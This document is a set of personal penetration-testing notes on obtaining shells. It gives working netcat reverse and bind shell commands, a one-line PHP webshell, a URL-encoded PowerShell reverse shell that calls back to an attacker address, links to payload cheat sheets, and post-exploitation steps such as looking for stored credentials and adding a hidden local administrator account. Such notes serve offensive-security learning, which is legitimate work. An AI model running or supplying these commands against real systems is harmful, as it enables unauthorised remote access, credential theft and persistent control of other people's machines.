= Shell

sh, bash, zsh, ... for Linux, and cmd.exe, powershell for Windows

Should use `-p` to preserve permissions when starting a shell.

== Types

=== Reverse shell
Command line access on a server. The target is forced to execute code that connects back to our computer's listener.

Good way to bypass firewall rules, but we need to configure our network to accept this connection.

Easier to execute and debug.

On attacking machine
[source, bash]
----
nc -lvnp 443
----

On target machine
[source, bash]
----
nc [attacking machine ip] 443 -e /bin/bash
----

*We are listening on our own attacking machine, and sending a connection from the target.*

=== Bind shell
Open up a port on a server, connect to it and execute commands. The code executed on the target is used to start a listener attached to a shell directly on the target.

We don't have to configure our network but this may be prevented by target's firewall rules.

On attacking machine
[source, bash]
----
nc [target machine ip] 443
----

On target machine
[source, bash]
----
nc -lvnp 443 -e "cmd.exe"
----

*We are listening on the target, then connecting to it with our own machine.*

=== Interactive vs Non-Interactive shells
Interactive: powershell, bash, zsh, ... we can interact with programs after executing them => ssh then fingerprint then...

Non-Interactive: can only use programs which do not require user interaction in order to run properly. => ssh won't work here, only commands like whoami, ...

=== WebShell
Upload a an executable file to a website to get a reverse/bind shell is not always possible so we can try to upload a webshell (script that runs inside a webserver and returns result on the page).

[source, php]
----
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
----
then GET /shell.php?cmd=ifconfig

Check in Kali at /usr/share/webshells or https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php[PentestMonkey php-reverse-shell] for Linux webserver.

When the target is Windows, it is often easiest to obtain RCE using a web shell or by using msfvenom to generate a reverse/bind shell in the language of the server.

URL encoded to pass to ?cmd ->
[source, bash]
----
powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27<IP>%27%2C<PORT>%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22
----

== Tools and payloads
netcat, socat, metasploit with multi/handler, msfvenom

payloads can also be found in several places:

* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md[PayloadsAllTheThings - Github]
* https://web.archive.org/web/20200901140719/http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet[Reverse Shell Cheatsheet - pentestmonkey]
* Kali Linux's /usr/share/webshells
* https://github.com/danielmiessler/SecLists [SecLists - Github]

== Next steps
* check for credentials
* check for SSH keys
* check for writeable /etc/shadow or /etc/passwd to give us access to the machine
* check registry on Windows (VNC, ...)
* check FileZilla credentials that can be stored in plaintext (FileZilla server.xml)

If we get a shell as SYSTEM user on Windows, add an account in the admin groups then log in over RDP, telnet, winexe, psexec, WinRM, ...

[source, bash]
----
net user <username> <password> /add
net localgroup administrators <username> /add
----

Reverse and bind shell should be temporary, the goal is to get a fully featured native shell.